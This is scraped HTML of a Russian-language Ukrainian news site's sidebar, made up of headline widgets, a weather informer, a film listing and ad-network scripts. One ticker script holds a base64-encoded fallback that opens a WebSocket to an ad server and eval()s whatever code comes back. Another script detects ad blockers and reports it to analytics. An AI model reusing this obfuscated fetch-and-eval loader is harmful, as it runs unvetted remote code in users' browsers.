srcset="https://enovosty.com/wp-content/uploads/2014/09/at4-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/at4-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/at4.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/135-granatomet-at4-ssha-shveciya" >Гранатомет AT4 (США-Швеция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4405864"><a href="https://enovosty.com/armiya/full/468-bronetransporter-pbv-302-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/PBV_302_edit-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/PBV_302_edit-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/PBV_302_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/PBV_302_edit.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/468-bronetransporter-pbv-302-shveciya" >Бронетранспортер Pbv 302 (Швеция)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости технологий</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4248,976', 4248, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4248,976', 4248, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4248,976', 4248, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_technology/full/1308-stalo-izvestno-kogda-nastupit-konec-sveta">Стало известно, когда наступит конец света (10451)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1508-vosstanie-mashin-umnye-duxovki-nachali-samostoyatelno-vklyuchatsya-nochyu">«Восстание машин»: «умные» духовки начали самостоятельно включаться ночью (2625)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1608-v-antarktide-nashli-piramidu-podo-ldom-video">В Антарктиде нашли пирамиду подо льдом (ВИДЕО) (1880)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet">В Катаре асфальт перекрашивают в синий цвет (1665)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1508-hubble-zapechatlel-vzryv-umirayushhej-sverxnovoj-zvezdy">Hubble запечатлел взрыв умирающей сверхновой звезды (1470)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1608-vms-ssha-ispravili-problemy-s-dvigatelem-na-svoem-superavianosce-za-13-milliardov-dollarov">ВМС США исправили проблемы с двигателем на своем суперавианосце за 13 миллиардов долларов (1387)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1708-katastrofa-blizko-kak-temperatura-48c-izmenit-goroda-na-zemle">Катастрофа близко: Как температура +48°C изменит города на Земле? (1240)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1608-nazvan-osnovnoj-istochnik-zagryazneniya-atmosfery-metanom">Назван основной источник загрязнения атмосферы метаном (745)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1308-eksperty-nazvali-smartfon-s-luchshim-displeem-na-rynke">Эксперты назвали смартфон с лучшим дисплеем на рынке (715)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1208-ukroboronprom-zajmetsya-serijnoj-modernizaciej-tankov-t-64-video">"Укроборонпром" займется серийной модернизацией танков Т-64 (ВИДЕО) (712)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301934"><a href="https://enovosty.com/person/full/1911-putin-vladimir" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/putyn-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/putyn-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/putyn.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/1911-putin-vladimir" >Владимир<br /> ПУТИН</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301944"><a href="https://enovosty.com/person/full/shherban-evgenij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/scherban-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/scherban-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/scherban.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/shherban-evgenij" >Евгений<br /> ЩЕРБАНЬ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4311608"><a href="https://enovosty.com/person/full/efremov-aleksandr" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/09/efremov_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/09/efremov_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/09/efremov_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/efremov-aleksandr" >Александр<br /> ЕФРЕМОВ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4372230"><a href="https://enovosty.com/person/full/451-tymchuk-dmitrij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/07/Timchuk-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/Timchuk-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/Timchuk.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/451-tymchuk-dmitrij" >Дмитрий<br /> ТЫМЧУК</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/1808-realno-ne-ponimaet-kakoj-vek-na-dvore-v-seti-opublikovali-video-iz-okkupirovannoj-gorlovki-video">"Реально не понимает, какой век на дворе!": в Сети опубликовали видео из оккупированной Горловки (ВИДЕО (2591)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1808-obnarodovan-pervyj-otchet-razvedki-ssha-otnositelno-katastrofy-na-chaes">Обнародован первый отчет разведки США относительно катастрофы на ЧАЭС (2243)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/1808-v-ukraine-xotyat-vvesti-posemejnoe-deklarirovanie-doxodov">В Украине хотят ввести посемейное декларирование доходов (2016)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet">В Катаре асфальт перекрашивают в синий цвет (1639)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/1808-v-chest-dnya-nezavisimosti-ukrainy-kievlyane-poluchat-odnorazovuyu-materialnuyu-pomoshh">В честь Дня независимости Украины киевляне получат одноразовую материальную помощь (1340)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1708-roditelyam-na-zametku-kakie-novovvedeniya-zhdut-shkolnikov-s-novogo-uchebnogo-goda">Родителям на заметку: какие нововведения ждут школьников с нового учебного года (1313)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1808-rossijskie-voennye-v-krymu-sluchajno-umudrilis-zapustit-raketu-vozdux-zemlya">Российские военные в Крыму случайно умудрились запустить ракету "воздух - земля" (1087)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1808-v-ukraine-odinokim-lyudyam-razreshat-usynovlyat-detej">В Украине одиноким людям разрешат усыновлять детей (1048)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/1808-proval-eksperimenta-doroga-iz-solnechnyx-batarej-okazalas-neeffektivnoj">Провал эксперимента: Дорога из солнечных батарей оказалась неэффективной (925)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1808-ili-ty-i-tvoya-semya-otstanete-ot-menya-ili-mezhdu-nami-vse-koncheno-megan-markl-postavila-zhestkij-ultimatum-princu-garri">«Или ты и твоя семья отстанете от меня, или между нами все кончено!»: Меган Маркл поставила жесткий ультиматум принцу Гарри (824)</a></p></div> </div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><br /><div id="rontar_adplace_13638"></div><script type="text/javascript"><!--

(function (w, d, n) {var ri = { rontar_site_id: 4818, rontar_adplace_id: 13638, rontar_place_id:
'rontar_adplace_13638', adCode_rootUrl: 'https://adcode.rontar.com/' };
w[n] = w[n] || [];w[n].push(
ri
);var a = document.createElement('script');a.type = 'text/javascript';a.async = true;a.src = 'https://adcode.rontar.com/rontar2_async.js?rnd=' +
Math.round(Math.random() * 100000);var b = document.getElementById('rontar_adplace_' + ri.rontar_adplace_id);b.parentNode.insertBefore(a, b);})(window, document, 'rontar_ads');//--></script><br /></div> </div><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/tehnologii/full/2805-kompaniya-eos-maksa-polyakova-sozdast-pervuyu-cifrovuyu-kartu-antarktidy-na-osnove-kosmicheskix-dannyx" title="Компания EOS Макса Полякова создаст первую цифровую карту Антарктиды на основе космических данных" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2019/05/antarktida-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/05/antarktida-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2019/05/antarktida-112x74.jpg 112w, https://enovosty.com/wp-content/uploads/2019/05/antarktida-640x426.jpg 640w, https://enovosty.com/wp-content/uploads/2019/05/antarktida-e1565085743375.jpg 460w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/tehnologii/full/2805-kompaniya-eos-maksa-polyakova-sozdast-pervuyu-cifrovuyu-kartu-antarktidy-na-osnove-kosmicheskix-dannyx" style="line-height: 1.1;" rel="bookmark" title="Компания EOS Макса Полякова создаст первую цифровую карту Антарктиды на основе космических данных">Компания EOS Макса Полякова создаст первую цифровую карту Антарктиды на основе космических данных</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/tehnologii/full/1303-top-modeli-smartfonov-kakie-novinki-udivyat-mir" title="ТОП-модели смартфонов: Какие новинки удивят мир" > <img width="275" height="200" src="https://enovosty.com/wp-content/uploads/2019/03/huawei.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/03/huawei.jpg 460w, https://enovosty.com/wp-content/uploads/2019/03/huawei-112x81.jpg 112w, https://enovosty.com/wp-content/uploads/2019/03/huawei-300x218.jpg 300w, https://enovosty.com/wp-content/uploads/2019/03/huawei-52x38.jpg 52w, https://enovosty.com/wp-content/uploads/2019/03/huawei-129x95.jpg 129w, https://enovosty.com/wp-content/uploads/2019/03/huawei-230x167.jpg 230w" sizes="(max-width: 275px) 100vw, 275px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/tehnologii/full/1303-top-modeli-smartfonov-kakie-novinki-udivyat-mir" style="line-height: 1.1;" rel="bookmark" title="ТОП-модели смартфонов: Какие новинки удивят мир">ТОП-модели смартфонов: Какие новинки удивят мир</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/tehnologii/full/1203-firefly-aerospace-maksa-polyakova-realnaya-perspektiva-dostupnogo-kosmosa" title="FireFly AeroSpace Макса Полякова — реальная перспектива доступного космоса" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2019/03/max_polyakov-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="бизнесмен Макс Поляков" srcset="https://enovosty.com/wp-content/uploads/2019/03/max_polyakov-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2019/03/max_polyakov-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2019/03/max_polyakov.jpg 460w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/tehnologii/full/1203-firefly-aerospace-maksa-polyakova-realnaya-perspektiva-dostupnogo-kosmosa" style="line-height: 1.1;" rel="bookmark" title="FireFly AeroSpace Макса Полякова — реальная перспектива доступного космоса">FireFly AeroSpace Макса Полякова — реальная перспектива доступного космоса</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/tehnologii/full/503-amerikanskaya-alternativa-soyuzu-kak-spacex-i-boeing-budut-dostavlyat-astronavtov-nasa-na-mks" title="Американская альтернатива «Союзу»: как SpaceX и Boeing будут доставлять астронавтов NASA на МКС" > <img width="300" height="168" src="https://enovosty.com/wp-content/uploads/2019/03/spacex.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/03/spacex.jpg 460w, https://enovosty.com/wp-content/uploads/2019/03/spacex-112x63.jpg 112w, https://enovosty.com/wp-content/uploads/2019/03/spacex-300x168.jpg 300w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/tehnologii/full/503-amerikanskaya-alternativa-soyuzu-kak-spacex-i-boeing-budut-dostavlyat-astronavtov-nasa-na-mks" style="line-height: 1.1;" rel="bookmark" title="Американская альтернатива «Союзу»: как SpaceX и Boeing будут доставлять астронавтов NASA на МКС">Американская альтернатива «Союзу»: как SpaceX и Boeing будут доставлять астронавтов NASA на МКС</a></p></div><div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/tehnologii/full/2410-lazernye-texnologii-prevrashhayut-fantastiku-v-realnost" title="Лазерные технологии превращают фантастику в реальность" > <img width="293" height="200" src="https://enovosty.com/wp-content/uploads/2018/10/laws_ed2.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/10/laws_ed2.jpg 300w, https://enovosty.com/wp-content/uploads/2018/10/laws_ed2-112x77.jpg 112w" sizes="(max-width: 293px) 100vw, 293px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/tehnologii/full/2410-lazernye-texnologii-prevrashhayut-fantastiku-v-realnost" style="line-height: 1.1;" rel="bookmark" title="Лазерные технологии превращают фантастику в реальность">Лазерные технологии превращают фантастику в реальность</a></p></div><div class="rightsidbaranalitika_2" style="background-color:#ebf0f4; margin-top: 20px; margin-bottom: 15px;"> <a href="https://enovosty.com/auto/full/2604-proizvodstvennye-kooperacii-s-mirovymi-avtomobilnymi-brendami-perspektivy-sozdaniya" title="Производственные кооперации с мировыми автомобильными брендами: перспективы украинского автопрома" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2019/04/avtoprom_ed-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/04/avtoprom_ed-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2019/04/avtoprom_ed-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2019/04/avtoprom_ed.jpg 460w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font-size: 14px;font-weight: bold;"><a href="https://enovosty.com/auto/full/2604-proizvodstvennye-kooperacii-s-mirovymi-avtomobilnymi-brendami-perspektivy-sozdaniya" rel="bookmark" title="Производственные кооперации с мировыми автомобильными брендами: перспективы украинского автопрома">Производственные кооперации с мировыми автомобильными брендами: перспективы украинского автопрома</a></p></div><div class="rightsidbaranalitika_2" style="background-color:#ebf0f4; margin-top: 20px; margin-bottom: 15px;"> <a href="https://enovosty.com/auto/full/1903-rynok-avtomobilej-chto-vybirayut-ukraincy" title="Рынок автомобилей: Что выбирают украинцы" > <img width="300" height="176" src="https://enovosty.com/wp-content/uploads/2019/03/duster_ed.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/03/duster_ed.jpg 460w, https://enovosty.com/wp-content/uploads/2019/03/duster_ed-112x66.jpg 112w, https://enovosty.com/wp-content/uploads/2019/03/duster_ed-300x176.jpg 300w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font-size: 14px;font-weight: bold;"><a href="https://enovosty.com/auto/full/1903-rynok-avtomobilej-chto-vybirayut-ukraincy" rel="bookmark" title="Рынок автомобилей: Что выбирают украинцы">Рынок автомобилей: Что выбирают украинцы</a></p></div><div class="rightsidbaranalitika_2" style="background-color:#ebf0f4; margin-top: 20px; margin-bottom: 15px;"> <a href="https://enovosty.com/auto/full/2009-evroblyaxery-protiv-avtoimporterov-gde-interesy-ukraincev" title="Евробляхеры против автоимпортеров: где интересы украинцев" > <img width="300" height="180" src="https://enovosty.com/wp-content/uploads/2018/09/evroblyahi.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/09/evroblyahi.jpg 300w, https://enovosty.com/wp-content/uploads/2018/09/evroblyahi-112x67.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font-size: 14px;font-weight: bold;"><a href="https://enovosty.com/auto/full/2009-evroblyaxery-protiv-avtoimporterov-gde-interesy-ukraincev" rel="bookmark" title="Евробляхеры против автоимпортеров: где интересы украинцев">Евробляхеры против автоимпортеров: где интересы украинцев</a></p></div><div class="rightsidbaranalitika_2" style="background-color:#ebf0f4; margin-top: 20px; margin-bottom: 15px;"> <a href="https://enovosty.com/auto/full/1709-v-ukraine-vvodyat-ogromnye-shtrafy-za-narushenie-pdd" title="В Украине вводят огромные штрафы за нарушение ПДД" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/09/gai_ed-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/09/gai_ed.jpg 300w, https://enovosty.com/wp-content/uploads/2018/09/gai_ed-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font-size: 14px;font-weight: bold;"><a href="https://enovosty.com/auto/full/1709-v-ukraine-vvodyat-ogromnye-shtrafy-za-narushenie-pdd" rel="bookmark" title="В Украине вводят огромные штрафы за нарушение ПДД">В Украине вводят огромные штрафы за нарушение ПДД</a></p></div><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36643" type="text/javascript">(function() {var worker36643,tickerID = 36643,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36643'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36643');script.setAttribute('data-idn', idn);script.src = '//vir7on.news/ru-n4p/0/36/ticker_36643.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36643.postMessage(data);}worker36643 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36643.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36643.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"><div id="cityLink"><a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"><img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"></a></div><div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"><img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td></tr> </table></div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"><script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://plus.google.com/104224979035578149686" rel="nofollow" target="_blank" class="gplus"><i></i></a></td></tr></table></div><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-588"></div><script type="text/javascript">new MTr('300-588', {site:907,format:0});</script><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><div id="lastafisha" class="slide" style="width:240px;margin:auto;"><script>jQuery(document).ready(function($){function region(){html = $('#lastafisha .anythingWindow .activePage .region').html();$('#lastafisha .head span').html(html);}$('#sliderafisha').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><p style="margin: 0;
font-size: 13pt;
font-weight: 700;
font-family: arial,verdana,tahoma;
text-align: left;
padding: 10px 32px 10px 35px;" class="head">Афиша<span style="float: right; font-size: 11px; line-height: 18px;">&nbsp;</span></p><ul id="sliderafisha"><li><ul class="tact"><li ><div id="post-4768603" class="postafisha"><span class="region">Киев 22&#160;серпня</span><div class="aimg"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-malenkoe-krasnoe-plate"><img width="170" height="132" alt="Кинопремьера: фильм «Маленькое красное ..." src="/wp-content/uploads/2019/08/suknya.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-malenkoe-krasnoe-plate">Кинопремьера: фильм «Маленькое красное ...</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4768618" class="postafisha"><span class="region">Киев 22&#160;серпня</span><div class="aimg"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-polina-i-tajna-kinostudii"><img width="170" height="132" alt="Кинопремьера: фильм «Полина и тайна киностудии» ..." src="/wp-content/uploads/2019/08/polina2.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-polina-i-tajna-kinostudii">Кинопремьера: фильм «Полина и тайна киностудии» ...</a></div></div></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div> </br></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
